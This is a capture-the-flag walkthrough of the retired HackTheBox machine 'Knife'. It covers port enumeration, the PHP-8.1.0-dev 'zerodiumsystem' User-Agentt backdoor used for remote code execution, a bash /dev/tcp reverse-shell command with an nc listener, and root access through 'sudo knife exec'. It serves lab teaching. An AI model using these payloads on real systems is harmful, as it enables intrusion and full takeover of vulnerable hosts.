HackTheBox - Knife

OS Difficulty IP Address Status
Linux Easy Retired

This was classified as an easy difficulty machine by MrKN16H7 on HackTheBox that has a webpage on port 80, running a developmental version of PHP which is vulnerable to remote code execution. We will analyze the vulnerability and then use a script by Richard Jones on PacketStorm to gain our foothold on the box. And finally, our privilege escalation vector will be a binary named knife which is a command line tool to manage the infrastructure automation tool called Chef.

Phase 1 - Enumeration


As usual, we start off with a Nmap, to know which ports are opened.

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We only see two ports opened: (i) SSH (ii) Apache httpd

Port 80

When we open the webpage, looks like nothing but a static webpage:
enter image description here

But when we look at the webpage through the DevTools, we see the version of PHP it is running:

enter image description here

Phase 2 - Exploitation

PHP-8.1.0-dev Backdoor (RCE)

A quick search on PHP-8.1.0-dev reveals right away an unauthenticated remote code execution vulnerability. Details and usage can be found here. We also find two proof-of-concept scripts; one by flast101 on ExploitDB and the other by Mayank Deshmukh on PacketStorm

Analyzing the Exploit

Looking at the exploit script, the vulnerability is simple and straight forward:

headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"

As seen in the above snippet from the exploit script, the backdoor lies in the User-Agent header. If we add an extra “t” to “User-Agent” and type “zerodiumsystem” as the User-Agent value; within it’s parameters we can execute commands:

enter image description here

So, we can add a Bash reverse shell, listen on the specified port and get the shell as james; or even simpler, we can just run the script by PacketStorm.

└─$ python3 php_8.1.0-dev.py -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"
└─$ nc -lnvp 9000
listening on [any] 9000 ... 
connect to [] from (UNKNOWN) [] 55806 
bash: cannot set terminal process group (933): Inappropriate ioctl for device 
bash: no job control in this shell 
[email protected]:/$

And we are in as james!

Phase 3 - Privilege Escalation

Knife from Chef

Chef is an automation/infrastructure platform:

Chef Infra is a powerful automation platform that transforms infrastructure into code. Whether you’re operating in the cloud, on-premises, or in a hybrid environment, Chef Infra automates how infrastructure is configured, deployed, and managed across your network, no matter its size.

And knife is a command line tool to manage Chef.

Listing the permission our user james has to run commands as root, we find one:

[email protected]:~$  sudo  -l  
Matching Defaults entries for james on knife: 
	env_reset, mail_badpass, 

User james may run the following commands on knife: 
	(root) NOPASSWD: /usr/bin/knife

So, we can run knife as root. We take a quick look at GTFObins and find a page for knife, and all we need to do is run knife with the exec command which will run Ruby code to execute other commands, and in our case; Bash.

[email protected]:~$  sudo knife exec  -E  "exec '/bin/bash'"  
[email protected]:/home/james#

And we are root!